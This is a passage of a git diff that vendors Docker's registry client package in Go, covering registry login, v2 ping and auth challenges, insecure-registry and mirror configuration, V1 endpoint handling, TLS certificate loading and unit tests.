v2AuthHTTPClient(endpoint.URL, authTransport, modifiers, creds, nil) + if err != nil { + return "", "", err + } + + endpointStr := strings.TrimRight(endpoint.URL.String(), "/") + "/v2/" + req, err := http.NewRequest("GET", endpointStr, nil) + if err != nil { + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err + } + + resp, err := loginClient.Do(req) + if err != nil { + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + // TODO(dmcgowan): Attempt to further interpret result, status code and error code string + err := fmt.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode)) + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err + } + + return "Login Succeeded", credentialAuthConfig.IdentityToken, nil + +} + +func v2AuthHTTPClient(endpoint *url.URL, authTransport http.RoundTripper, modifiers []transport.RequestModifier, creds auth.CredentialStore, scopes []auth.Scope) (*http.Client, bool, error) { + challengeManager, foundV2, err := PingV2Registry(endpoint, authTransport) + if err != nil { + if !foundV2 { + err = fallbackError{err: err} + } + return nil, foundV2, err + } + + tokenHandlerOptions := auth.TokenHandlerOptions{ + Transport: authTransport, + Credentials: creds, + OfflineAccess: true, + ClientID: AuthClientID, + Scopes: scopes, + } + tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) + basicHandler := auth.NewBasicHandler(creds) + modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler)) + tr := transport.NewTransport(authTransport, modifiers...) + + return &http.Client{ + Transport: tr, + Timeout: 15 * time.Second, + }, foundV2, nil + +} + +// ConvertToHostname converts a registry url which has http|https prepended +// to just an hostname. +func ConvertToHostname(url string) string { + stripped := url + if strings.HasPrefix(url, "http://") { + stripped = strings.TrimPrefix(url, "http://") + } else if strings.HasPrefix(url, "https://") { + stripped = strings.TrimPrefix(url, "https://") + } + + nameParts := strings.SplitN(stripped, "/", 2) + + return nameParts[0] +} + +// ResolveAuthConfig matches an auth configuration to a server address or a URL +func ResolveAuthConfig(authConfigs map[string]types.AuthConfig, index *registrytypes.IndexInfo) types.AuthConfig { + configKey := GetAuthConfigKey(index) + // First try the happy case + if c, found := authConfigs[configKey]; found || index.Official { + return c + } + + // Maybe they have a legacy config file, we will iterate the keys converting + // them to the new format and testing + for registry, ac := range authConfigs { + if configKey == ConvertToHostname(registry) { + return ac + } + } + + // When all else fails, return an empty auth config + return types.AuthConfig{} +} + +// PingResponseError is used when the response from a ping +// was received but invalid. +type PingResponseError struct { + Err error +} + +func (err PingResponseError) Error() string { + return err.Err.Error() +} + +// PingV2Registry attempts to ping a v2 registry and on success return a +// challenge manager for the supported authentication types and +// whether v2 was confirmed by the response. If a response is received but +// cannot be interpreted a PingResponseError will be returned. +func PingV2Registry(endpoint *url.URL, transport http.RoundTripper) (challenge.Manager, bool, error) { + var ( + foundV2 = false + v2Version = auth.APIVersion{ + Type: "registry", + Version: "2.0", + } + ) + + pingClient := &http.Client{ + Transport: transport, + Timeout: 15 * time.Second, + } + endpointStr := strings.TrimRight(endpoint.String(), "/") + "/v2/" + req, err := http.NewRequest("GET", endpointStr, nil) + if err != nil { + return nil, false, err + } + resp, err := pingClient.Do(req) + if err != nil { + return nil, false, err + } + defer resp.Body.Close() + + versions := auth.APIVersions(resp, DefaultRegistryVersionHeader) + for _, pingVersion := range versions { + if pingVersion == v2Version { + // The version header indicates we're definitely + // talking to a v2 registry. So don't allow future + // fallbacks to the v1 protocol. + + foundV2 = true + break + } + } + + challengeManager := challenge.NewSimpleManager() + if err := challengeManager.AddResponse(resp); err != nil { + return nil, foundV2, PingResponseError{ + Err: err, + } + } + + return challengeManager, foundV2, nil +} diff --git a/vendor/github.com/docker/docker/registry/auth_test.go b/vendor/github.com/docker/docker/registry/auth_test.go new file mode 100644 index 0000000000..9ab71aa4fb --- /dev/null +++ b/vendor/github.com/docker/docker/registry/auth_test.go @@ -0,0 +1,124 @@ +// +build !solaris + +// TODO: Support Solaris + +package registry + +import ( + "testing" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" +) + +func buildAuthConfigs() map[string]types.AuthConfig { + authConfigs := map[string]types.AuthConfig{} + + for _, registry := range []string{"testIndex", IndexServer} { + authConfigs[registry] = types.AuthConfig{ + Username: "docker-user", + Password: "docker-pass", + } + } + + return authConfigs +} + +func TestSameAuthDataPostSave(t *testing.T) { + authConfigs := buildAuthConfigs() + authConfig := authConfigs["testIndex"] + if authConfig.Username != "docker-user" { + t.Fail() + } + if authConfig.Password != "docker-pass" { + t.Fail() + } + if authConfig.Auth != "" { + t.Fail() + } +} + +func TestResolveAuthConfigIndexServer(t *testing.T) { + authConfigs := buildAuthConfigs() + indexConfig := authConfigs[IndexServer] + + officialIndex := ®istrytypes.IndexInfo{ + Official: true, + } + privateIndex := ®istrytypes.IndexInfo{ + Official: false, + } + + resolved := ResolveAuthConfig(authConfigs, officialIndex) + assertEqual(t, resolved, indexConfig, "Expected ResolveAuthConfig to return IndexServer") + + resolved = ResolveAuthConfig(authConfigs, privateIndex) + assertNotEqual(t, resolved, indexConfig, "Expected ResolveAuthConfig to not return IndexServer") +} + +func TestResolveAuthConfigFullURL(t *testing.T) { + authConfigs := buildAuthConfigs() + + registryAuth := types.AuthConfig{ + Username: "foo-user", + Password: "foo-pass", + } + localAuth := types.AuthConfig{ + Username: "bar-user", + Password: "bar-pass", + } + officialAuth := types.AuthConfig{ + Username: "baz-user", + Password: "baz-pass", + } + authConfigs[IndexServer] = officialAuth + + expectedAuths := map[string]types.AuthConfig{ + "registry.example.com": registryAuth, + "localhost:8000": localAuth, + "registry.com": localAuth, + } + + validRegistries := map[string][]string{ + "registry.example.com": { + "https://registry.example.com/v1/", + "http://registry.example.com/v1/", + "registry.example.com", + "registry.example.com/v1/", + }, + "localhost:8000": { + "https://localhost:8000/v1/", + "http://localhost:8000/v1/", + "localhost:8000", + "localhost:8000/v1/", + }, + "registry.com": { + "https://registry.com/v1/", + "http://registry.com/v1/", + "registry.com", + "registry.com/v1/", + }, + } + + for configKey, registries := range validRegistries { + configured, ok := expectedAuths[configKey] + if !ok { + t.Fail() + } + index := ®istrytypes.IndexInfo{ + Name: configKey, + } + for _, registry := range registries { + authConfigs[registry] = configured + resolved := ResolveAuthConfig(authConfigs, index) + if resolved.Username != configured.Username || resolved.Password != configured.Password { + t.Errorf("%s -> %v != %v\n", registry, resolved, configured) + } + delete(authConfigs, registry) + resolved = ResolveAuthConfig(authConfigs, index) + if resolved.Username == configured.Username || resolved.Password == configured.Password { + t.Errorf("%s -> %v == %v\n", registry, resolved, configured) + } + } + } +} diff --git a/vendor/github.com/docker/docker/registry/config.go b/vendor/github.com/docker/docker/registry/config.go new file mode 100644 index 0000000000..9a4f6a9251 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config.go @@ -0,0 +1,305 @@ +package registry + +import ( + "errors" + "fmt" + "net" + "net/url" + "strings" + + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/opts" + "github.com/docker/docker/reference" + "github.com/spf13/pflag" +) + +// ServiceOptions holds command line options. +type ServiceOptions struct { + Mirrors []string `json:"registry-mirrors,omitempty"` + InsecureRegistries []string `json:"insecure-registries,omitempty"` + + // V2Only controls access to legacy registries. If it is set to true via the + // command line flag the daemon will not attempt to contact v1 legacy registries + V2Only bool `json:"disable-legacy-registry,omitempty"` +} + +// serviceConfig holds daemon configuration for the registry service. +type serviceConfig struct { + registrytypes.ServiceConfig + V2Only bool +} + +var ( + // DefaultNamespace is the default namespace + DefaultNamespace = "docker.io" + // DefaultRegistryVersionHeader is the name of the default HTTP header + // that carries Registry version info + DefaultRegistryVersionHeader = "Docker-Distribution-Api-Version" + + // IndexHostname is the index hostname + IndexHostname = "index.docker.io" + // IndexServer is used for user auth and image search + IndexServer = "https://" + IndexHostname + "/v1/" + // IndexName is the name of the index + IndexName = "docker.io" + + // NotaryServer is the endpoint serving the Notary trust server + NotaryServer = "https://notary.docker.io" + + // DefaultV2Registry is the URI of the default v2 registry + DefaultV2Registry = &url.URL{ + Scheme: "https", + Host: "registry-1.docker.io", + } +) + +var ( + // ErrInvalidRepositoryName is an error returned if the repository name did + // not have the correct form + ErrInvalidRepositoryName = errors.New("Invalid repository name (ex: \"registry.domain.tld/myrepos\")") + + emptyServiceConfig = newServiceConfig(ServiceOptions{}) +) + +// for mocking in unit tests +var lookupIP = net.LookupIP + +// InstallCliFlags adds command-line options to the top-level flag parser for +// the current process. +func (options *ServiceOptions) InstallCliFlags(flags *pflag.FlagSet) { + mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, ValidateMirror) + insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, ValidateIndexName) + + flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror") + flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication") + + options.installCliPlatformFlags(flags) +} + +// newServiceConfig returns a new instance of ServiceConfig +func newServiceConfig(options ServiceOptions) *serviceConfig { + config := &serviceConfig{ + ServiceConfig: registrytypes.ServiceConfig{ + InsecureRegistryCIDRs: make([]*registrytypes.NetIPNet, 0), + IndexConfigs: make(map[string]*registrytypes.IndexInfo, 0), + // Hack: Bypass setting the mirrors to IndexConfigs since they are going away + // and Mirrors are only for the official registry anyways. + Mirrors: options.Mirrors, + }, + V2Only: options.V2Only, + } + + config.LoadInsecureRegistries(options.InsecureRegistries) + + return config +} + +// LoadInsecureRegistries loads insecure registries to config +func (config *serviceConfig) LoadInsecureRegistries(registries []string) error { + // Localhost is by default considered as an insecure registry + // This is a stop-gap for people who are running a private registry on localhost (especially on Boot2docker). + // + // TODO: should we deprecate this once it is easier for people to set up a TLS registry or change + // daemon flags on boot2docker? + registries = append(registries, "127.0.0.0/8") + + // Store original InsecureRegistryCIDRs and IndexConfigs + // Clean InsecureRegistryCIDRs and IndexConfigs in config, as passed registries has all insecure registry info. + originalCIDRs := config.ServiceConfig.InsecureRegistryCIDRs + originalIndexInfos := config.ServiceConfig.IndexConfigs + + config.ServiceConfig.InsecureRegistryCIDRs = make([]*registrytypes.NetIPNet, 0) + config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo, 0) + +skip: + for _, r := range registries { + // validate insecure registry + if _, err := ValidateIndexName(r); err != nil { + // before returning err, roll back to original data + config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs + config.ServiceConfig.IndexConfigs = originalIndexInfos + return err + } + // Check if CIDR was passed to --insecure-registry + _, ipnet, err := net.ParseCIDR(r) + if err == nil { + // Valid CIDR. If ipnet is already in config.InsecureRegistryCIDRs, skip. + data := (*registrytypes.NetIPNet)(ipnet) + for _, value := range config.InsecureRegistryCIDRs { + if value.IP.String() == data.IP.String() && value.Mask.String() == data.Mask.String() { + continue skip + } + } + // ipnet is not found, add it in config.InsecureRegistryCIDRs + config.InsecureRegistryCIDRs = append(config.InsecureRegistryCIDRs, data) + + } else { + // Assume `host:port` if not CIDR. + config.IndexConfigs[r] = ®istrytypes.IndexInfo{ + Name: r, + Mirrors: make([]string, 0), + Secure: false, + Official: false, + } + } + } + + // Configure public registry. + config.IndexConfigs[IndexName] = ®istrytypes.IndexInfo{ + Name: IndexName, + Mirrors: config.Mirrors, + Secure: true, + Official: true, + } + + return nil +} + +// isSecureIndex returns false if the provided indexName is part of the list of insecure registries +// Insecure registries accept HTTP and/or accept HTTPS with certificates from unknown CAs. +// +// The list of insecure registries can contain an element with CIDR notation to specify a whole subnet. +// If the subnet contains one of the IPs of the registry specified by indexName, the latter is considered +// insecure. +// +// indexName should be a URL.Host (`host:port` or `host`) where the `host` part can be either a domain name +// or an IP address. If it is a domain name, then it will be resolved in order to check if the IP is contained +// in a subnet. If the resolving is not successful, isSecureIndex will only try to match hostname to any element +// of insecureRegistries. +func isSecureIndex(config *serviceConfig, indexName string) bool { + // Check for configured index, first. This is needed in case isSecureIndex + // is called from anything besides newIndexInfo, in order to honor per-index configurations. + if index, ok := config.IndexConfigs[indexName]; ok { + return index.Secure + } + + host, _, err := net.SplitHostPort(indexName) + if err != nil { + // assume indexName is of the form `host` without the port and go on. + host = indexName + } + + addrs, err := lookupIP(host) + if err != nil { + ip := net.ParseIP(host) + if ip != nil { + addrs = []net.IP{ip} + } + + // if ip == nil, then `host` is neither an IP nor it could be looked up, + // either because the index is unreachable, or because the index is behind an HTTP proxy. + // So, len(addrs) == 0 and we're not aborting. + } + + // Try CIDR notation only if addrs has any elements, i.e. if `host`'s IP could be determined. + for _, addr := range addrs { + for _, ipnet := range config.InsecureRegistryCIDRs { + // check if the addr falls in the subnet + if (*net.IPNet)(ipnet).Contains(addr) { + return false + } + } + } + + return true +} + +// ValidateMirror validates an HTTP(S) registry mirror +func ValidateMirror(val string) (string, error) { + uri, err := url.Parse(val) + if err != nil { + return "", fmt.Errorf("%s is not a valid URI", val) + } + + if uri.Scheme != "http" && uri.Scheme != "https" { + return "", fmt.Errorf("Unsupported scheme %s", uri.Scheme) + } + + if uri.Path != "" || uri.RawQuery != "" || uri.Fragment != "" { + return "", fmt.Errorf("Unsupported path/query/fragment at end of the URI") + } + + return fmt.Sprintf("%s://%s/", uri.Scheme, uri.Host), nil +} + +// ValidateIndexName validates an index name. +func ValidateIndexName(val string) (string, error) { + if val == reference.LegacyDefaultHostname { + val = reference.DefaultHostname + } + if strings.HasPrefix(val, "-") || strings.HasSuffix(val, "-") { + return "", fmt.Errorf("Invalid index name (%s). Cannot begin or end with a hyphen.", val) + } + return val, nil +} + +func validateNoScheme(reposName string) error { + if strings.Contains(reposName, "://") { + // It cannot contain a scheme! + return ErrInvalidRepositoryName + } + return nil +} + +// newIndexInfo returns IndexInfo configuration from indexName +func newIndexInfo(config *serviceConfig, indexName string) (*registrytypes.IndexInfo, error) { + var err error + indexName, err = ValidateIndexName(indexName) + if err != nil { + return nil, err + } + + // Return any configured index info, first. + if index, ok := config.IndexConfigs[indexName]; ok { + return index, nil + } + + // Construct a non-configured index info. + index := ®istrytypes.IndexInfo{ + Name: indexName, + Mirrors: make([]string, 0), + Official: false, + } + index.Secure = isSecureIndex(config, indexName) + return index, nil +} + +// GetAuthConfigKey special-cases using the full index address of the official +// index as the AuthConfig key, and uses the (host)name[:port] for private indexes. +func GetAuthConfigKey(index *registrytypes.IndexInfo) string { + if index.Official { + return IndexServer + } + return index.Name +} + +// newRepositoryInfo validates and breaks down a repository name into a RepositoryInfo +func newRepositoryInfo(config *serviceConfig, name reference.Named) (*RepositoryInfo, error) { + index, err := newIndexInfo(config, name.Hostname()) + if err != nil { + return nil, err + } + official := !strings.ContainsRune(name.Name(), '/') + return &RepositoryInfo{ + Named: name, + Index: index, + Official: official, + }, nil +} + +// ParseRepositoryInfo performs the breakdown of a repository name into a RepositoryInfo, but +// lacks registry configuration. +func ParseRepositoryInfo(reposName reference.Named) (*RepositoryInfo, error) { + return newRepositoryInfo(emptyServiceConfig, reposName) +} + +// ParseSearchIndexInfo will use repository name to get back an indexInfo. +func ParseSearchIndexInfo(reposName string) (*registrytypes.IndexInfo, error) { + indexName, _ := splitReposSearchTerm(reposName) + + indexInfo, err := newIndexInfo(emptyServiceConfig, indexName) + if err != nil { + return nil, err + } + return indexInfo, nil +} diff --git a/vendor/github.com/docker/docker/registry/config_test.go b/vendor/github.com/docker/docker/registry/config_test.go new file mode 100644 index 0000000000..25578a7f2b --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config_test.go @@ -0,0 +1,49 @@ +package registry + +import ( + "testing" +) + +func TestValidateMirror(t *testing.T) { + valid := []string{ + "http://mirror-1.com", + "https://mirror-1.com", + "http://localhost", + "https://localhost", + "http://localhost:5000", + "https://localhost:5000", + "http://127.0.0.1", + "https://127.0.0.1", + "http://127.0.0.1:5000", + "https://127.0.0.1:5000", + } + + invalid := []string{ + "!invalid!://%as%", + "ftp://mirror-1.com", + "http://mirror-1.com/", + "http://mirror-1.com/?q=foo", + "http://mirror-1.com/v1/", + "http://mirror-1.com/v1/?q=foo", + "http://mirror-1.com/v1/?q=foo#frag", + "http://mirror-1.com?q=foo", + "https://mirror-1.com#frag", + "https://mirror-1.com/", + "https://mirror-1.com/#frag", + "https://mirror-1.com/v1/", + "https://mirror-1.com/v1/#", + "https://mirror-1.com?q", + } + + for _, address := range valid { + if ret, err := ValidateMirror(address); err != nil || ret == "" { + t.Errorf("ValidateMirror(`"+address+"`) got %s %s", ret, err) + } + } + + for _, address := range invalid { + if ret, err := ValidateMirror(address); err == nil || ret != "" { + t.Errorf("ValidateMirror(`"+address+"`) got %s %s", ret, err) + } + } +} diff --git a/vendor/github.com/docker/docker/registry/config_unix.go b/vendor/github.com/docker/docker/registry/config_unix.go new file mode 100644 index 0000000000..d692e8ef50 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config_unix.go @@ -0,0 +1,25 @@ +// +build !windows + +package registry + +import ( + "github.com/spf13/pflag" +) + +var ( + // CertsDir is the directory where certificates are stored + CertsDir = "/etc/docker/certs.d" +) + +// cleanPath is used to ensure that a directory name is valid on the target +// platform. It will be passed in something *similar* to a URL such as +// https:/index.docker.io/v1. Not all platforms support directory names +// which contain those characters (such as : on Windows) +func cleanPath(s string) string { + return s +} + +// installCliPlatformFlags handles any platform specific flags for the service. +func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { + flags.BoolVar(&options.V2Only, "disable-legacy-registry", false, "Disable contacting legacy registries") +} diff --git a/vendor/github.com/docker/docker/registry/config_windows.go b/vendor/github.com/docker/docker/registry/config_windows.go new file mode 100644 index 0000000000..d1b313dc1e --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config_windows.go @@ -0,0 +1,25 @@ +package registry + +import ( + "os" + "path/filepath" + "strings" + + "github.com/spf13/pflag" +) + +// CertsDir is the directory where certificates are stored +var CertsDir = os.Getenv("programdata") + `\docker\certs.d` + +// cleanPath is used to ensure that a directory name is valid on the target +// platform. It will be passed in something *similar* to a URL such as +// https:\index.docker.io\v1. Not all platforms support directory names +// which contain those characters (such as : on Windows) +func cleanPath(s string) string { + return filepath.FromSlash(strings.Replace(s, ":", "", -1)) +} + +// installCliPlatformFlags handles any platform specific flags for the service. +func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { + // No Windows specific flags. +} diff --git a/vendor/github.com/docker/docker/registry/endpoint_test.go b/vendor/github.com/docker/docker/registry/endpoint_test.go new file mode 100644 index 0000000000..8451d3f678 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/endpoint_test.go @@ -0,0 +1,78 @@ +package registry + +import ( + "net/http" + "net/http/httptest" + "net/url" + "testing" +) + +func TestEndpointParse(t *testing.T) { + testData := []struct { + str string + expected string + }{ + {IndexServer, IndexServer}, + {"http://0.0.0.0:5000/v1/", "http://0.0.0.0:5000/v1/"}, + {"http://0.0.0.0:5000", "http://0.0.0.0:5000/v1/"}, + {"0.0.0.0:5000", "https://0.0.0.0:5000/v1/"}, + {"http://0.0.0.0:5000/nonversion/", "http://0.0.0.0:5000/nonversion/v1/"}, + {"http://0.0.0.0:5000/v0/", "http://0.0.0.0:5000/v0/v1/"}, + } + for _, td := range testData { + e, err := newV1EndpointFromStr(td.str, nil, "", nil) + if err != nil { + t.Errorf("%q: %s", td.str, err) + } + if e == nil { + t.Logf("something's fishy, endpoint for %q is nil", td.str) + continue + } + if e.String() != td.expected { + t.Errorf("expected %q, got %q", td.expected, e.String()) + } + } +} + +func TestEndpointParseInvalid(t *testing.T) { + testData := []string{ + "http://0.0.0.0:5000/v2/", + } + for _, td := range testData { + e, err := newV1EndpointFromStr(td, nil, "", nil) + if err == nil { + t.Errorf("expected error parsing %q: parsed as %q", td, e) + } + } +} + +// Ensure that a registry endpoint that responds with a 401 only is determined +// to be a valid v1 registry endpoint +func TestValidateEndpoint(t *testing.T) { + requireBasicAuthHandler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Add("WWW-Authenticate", `Basic realm="localhost"`) + w.WriteHeader(http.StatusUnauthorized) + }) + + // Make a test server which should validate as a v1 server. + testServer := httptest.NewServer(requireBasicAuthHandler) + defer testServer.Close() + + testServerURL, err := url.Parse(testServer.URL) + if err != nil { + t.Fatal(err) + } + + testEndpoint := V1Endpoint{ + URL: testServerURL, + client: HTTPClient(NewTransport(nil)), + } + + if err = validateEndpoint(&testEndpoint); err != nil { + t.Fatal(err) + } + + if testEndpoint.URL.Scheme != "http" { + t.Fatalf("expecting to validate endpoint as http, got url %s", testEndpoint.String()) + } +} diff --git a/vendor/github.com/docker/docker/registry/endpoint_v1.go b/vendor/github.com/docker/docker/registry/endpoint_v1.go new file mode 100644 index 0000000000..6bcf8c935d --- /dev/null +++ b/vendor/github.com/docker/docker/registry/endpoint_v1.go @@ -0,0 +1,198 @@ +package registry + +import ( + "crypto/tls" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/url" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/transport" + registrytypes "github.com/docker/docker/api/types/registry" +) + +// V1Endpoint stores basic information about a V1 registry endpoint. +type V1Endpoint struct { + client *http.Client + URL *url.URL + IsSecure bool +} + +// NewV1Endpoint parses the given address to return a registry endpoint. +func NewV1Endpoint(index *registrytypes.IndexInfo, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + tlsConfig, err := newTLSConfig(index.Name, index.Secure) + if err != nil { + return nil, err + } + + endpoint, err := newV1EndpointFromStr(GetAuthConfigKey(index), tlsConfig, userAgent, metaHeaders) + if err != nil { + return nil, err + } + + if err := validateEndpoint(endpoint); err != nil { + return nil, err + } + + return endpoint, nil +} + +func validateEndpoint(endpoint *V1Endpoint) error { + logrus.Debugf("pinging registry endpoint %s", endpoint) + + // Try HTTPS ping to registry + endpoint.URL.Scheme = "https" + if _, err := endpoint.Ping(); err != nil { + if endpoint.IsSecure { + // If registry is secure and HTTPS failed, show user the error and tell them about `--insecure-registry` + // in case that's what they need. DO NOT accept unknown CA certificates, and DO NOT fallback to HTTP. + return fmt.Errorf("invalid registry endpoint %s: %v. If this private registry supports only HTTP or HTTPS with an unknown CA certificate, please add `--insecure-registry %s` to the daemon's arguments. In the case of HTTPS, if you have access to the registry's CA certificate, no need for the flag; simply place the CA certificate at /etc/docker/certs.d/%s/ca.crt", endpoint, err, endpoint.URL.Host, endpoint.URL.Host) + } + + // If registry is insecure and HTTPS failed, fallback to HTTP. + logrus.Debugf("Error from registry %q marked as insecure: %v. Insecurely falling back to HTTP", endpoint, err) + endpoint.URL.Scheme = "http" + + var err2 error + if _, err2 = endpoint.Ping(); err2 == nil { + return nil + } + + return fmt.Errorf("invalid registry endpoint %q. HTTPS attempt: %v. HTTP attempt: %v", endpoint, err, err2) + } + + return nil +} + +func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + endpoint := &V1Endpoint{ + IsSecure: (tlsConfig == nil || !tlsConfig.InsecureSkipVerify), + URL: new(url.URL), + } + + *endpoint.URL = address + + // TODO(tiborvass): make sure a ConnectTimeout transport is used + tr := NewTransport(tlsConfig) + endpoint.client = HTTPClient(transport.NewTransport(tr, DockerHeaders(userAgent, metaHeaders)...)) + return endpoint, nil +} + +// trimV1Address trims the version off the address and returns the +// trimmed address or an error if there is a non-V1 version. +func trimV1Address(address string) (string, error) { + var ( + chunks []string + apiVersionStr string + ) + + if strings.HasSuffix(address, "/") { + address = address[:len(address)-1] + } + + chunks = strings.Split(address, "/") + apiVersionStr = chunks[len(chunks)-1] + if apiVersionStr == "v1" { + return strings.Join(chunks[:len(chunks)-1], "/"), nil + } + + for k, v := range apiVersions { + if k != APIVersion1 && apiVersionStr == v { + return "", fmt.Errorf("unsupported V1 version path %s", apiVersionStr) + } + } + + return address, nil +} + +func newV1EndpointFromStr(address string, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + if !strings.HasPrefix(address, "http://") && !strings.HasPrefix(address, "https://") { + address = "https://" + address + } + + address, err := trimV1Address(address) + if err != nil { + return nil, err + } + + uri, err := url.Parse(address) + if err != nil { + return nil, err + } + + endpoint, err := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders) + if err != nil { + return nil, err + } + + return endpoint, nil +} + +// Get the formatted URL for the root of this registry Endpoint +func (e *V1Endpoint) String() string { + return e.URL.String() + "/v1/" +} + +// Path returns a formatted string for the URL +// of this endpoint with the given path appended. +func (e *V1Endpoint) Path(path string) string { + return e.URL.String() + "/v1/" + path +} + +// Ping returns a PingResult which indicates whether the registry is standalone or not. +func (e *V1Endpoint) Ping() (PingResult, error) { + logrus.Debugf("attempting v1 ping for registry endpoint %s", e) + + if e.String() == IndexServer { + // Skip the check, we know this one is valid + // (and we never want to fallback to http in case of error) + return PingResult{Standalone: false}, nil + } + + req, err := http.NewRequest("GET", e.Path("_ping"), nil) + if err != nil { + return PingResult{Standalone: false}, err + } + + resp, err := e.client.Do(req) + if err != nil { + return PingResult{Standalone: false}, err + } + + defer resp.Body.Close() + + jsonString, err := ioutil.ReadAll(resp.Body) + if err != nil { + return PingResult{Standalone: false}, fmt.Errorf("error while reading the http response: %s", err) + } + + // If the header is absent, we assume true for compatibility with earlier + // versions of the registry. default to true + info := PingResult{ + Standalone: true, + } + if err := json.Unmarshal(jsonString, &info); err != nil { + logrus.Debugf("Error unmarshalling the _ping PingResult: %s", err) + // don't stop here. Just assume sane defaults + } + if hdr := resp.Header.Get("X-Docker-Registry-Version"); hdr != "" { + logrus.Debugf("Registry version header: '%s'", hdr) + info.Version = hdr + } + logrus.Debugf("PingResult.Version: %q", info.Version) + + standalone := resp.Header.Get("X-Docker-Registry-Standalone") + logrus.Debugf("Registry standalone header: '%s'", standalone) + // Accepted values are "true" (case-insensitive) and "1". + if strings.EqualFold(standalone, "true") || standalone == "1" { + info.Standalone = true + } else if len(standalone) > 0 { + // there is a header set, and it is not "true" or "1", so assume fails + info.Standalone = false + } + logrus.Debugf("PingResult.Standalone: %t", info.Standalone) + return info, nil +} diff --git a/vendor/github.com/docker/docker/registry/registry.go b/vendor/github.com/docker/docker/registry/registry.go new file mode 100644 index 0000000000..17fa97ce3d --- /dev/null +++ b/vendor/github.com/docker/docker/registry/registry.go @@ -0,0 +1,191 @@ +// Package registry contains client primitives to interact with a remote Docker registry. +package registry + +import ( + "crypto/tls" + "errors" + "fmt" + "io/ioutil" + "net" + "net/http" + "os" + "path/filepath" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" +) + +var ( + // ErrAlreadyExists is an error returned if an image being pushed + // already exists on the remote side + ErrAlreadyExists = errors.New("Image already exists") +) + +func newTLSConfig(hostname string, isSecure bool) (*tls.Config, error) { + // PreferredServerCipherSuites should have no effect + tlsConfig := tlsconfig.ServerDefault() + + tlsConfig.InsecureSkipVerify = !isSecure + + if isSecure && CertsDir != "" { + hostDir := filepath.Join(CertsDir, cleanPath(hostname)) + logrus.Debugf("hostDir: %s", hostDir) + if err := ReadCertsDirectory(tlsConfig, hostDir); err != nil { + return nil, err + } + } + + return tlsConfig, nil +} + +func hasFile(files []os.FileInfo, name string) bool { + for _, f := range files { + if f.Name() == name { + return true + } + } + return false +} + +// ReadCertsDirectory reads the directory for TLS certificates +// including roots and certificate pairs and updates the +// provided TLS configuration. +func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error { + fs, err := ioutil.ReadDir(directory) + if err != nil && !os.IsNotExist(err) { + return err + } + + for _, f := range fs { + if strings.HasSuffix(f.Name(), ".crt") { + if tlsConfig.RootCAs == nil { + systemPool, err := tlsconfig.SystemCertPool() + if err != nil { + return fmt.Errorf("unable to get system cert pool: %v", err) + } + tlsConfig.RootCAs = systemPool + } + logrus.Debugf("crt: %s", filepath.Join(directory, f.Name())) + data, err := ioutil.ReadFile(filepath.Join(directory, f.Name())) + if err != nil { + return err + } + tlsConfig.RootCAs.AppendCertsFromPEM(data) + } + if strings.HasSuffix(f.Name(), ".cert") { + certName := f.Name() + keyName := certName[:len(certName)-5] + ".key" + logrus.Debugf("cert: %s", filepath.Join(directory, f.Name())) + if !hasFile(fs, keyName) { + return fmt.Errorf("Missing key %s for client certificate %s. Note that CA certificates should use the extension .crt.", keyName, certName) + } + cert, err := tls.LoadX509KeyPair(filepath.Join(directory, certName), filepath.Join(directory, keyName)) + if err != nil { + return err + } + tlsConfig.Certificates = append(tlsConfig.Certificates, cert) + } + if strings.HasSuffix(f.Name(), ".key") { + keyName := f.Name() + certName := keyName[:len(keyName)-4] + ".cert" + logrus.Debugf("key: %s", filepath.Join(directory, f.Name())) + if !hasFile(fs, certName) { + return fmt.Errorf("Missing client certificate %s for key %s", certName, keyName) + } + } + } + + return nil +} + +// DockerHeaders returns request modifiers with a User-Agent and metaHeaders +func DockerHeaders(userAgent string, metaHeaders http.Header) []transport.RequestModifier { + modifiers := []transport.RequestModifier{} + if userAgent != "" { + modifiers = append(modifiers, transport.NewHeaderRequestModifier(http.Header{ + "User-Agent": []string{userAgent}, + })) + } + if metaHeaders != nil { + modifiers = append(modifiers, transport.NewHeaderRequestModifier(metaHeaders)) + } + return modifiers +} + +// HTTPClient returns an HTTP client structure which uses the given transport +// and contains the necessary headers for redirected requests +func HTTPClient(transport http.RoundTripper) *http.Client { + return &http.Client{ + Transport: transport, + CheckRedirect: addRequiredHeadersToRedirectedRequests, + } +} + +func trustedLocation(req *http.Request) bool { + var ( + trusteds = []string{"docker.com", "docker.io"} + hostname = strings.SplitN(req.Host, ":", 2)[0] + ) + if req.URL.Scheme != "https" { + return false + } + + 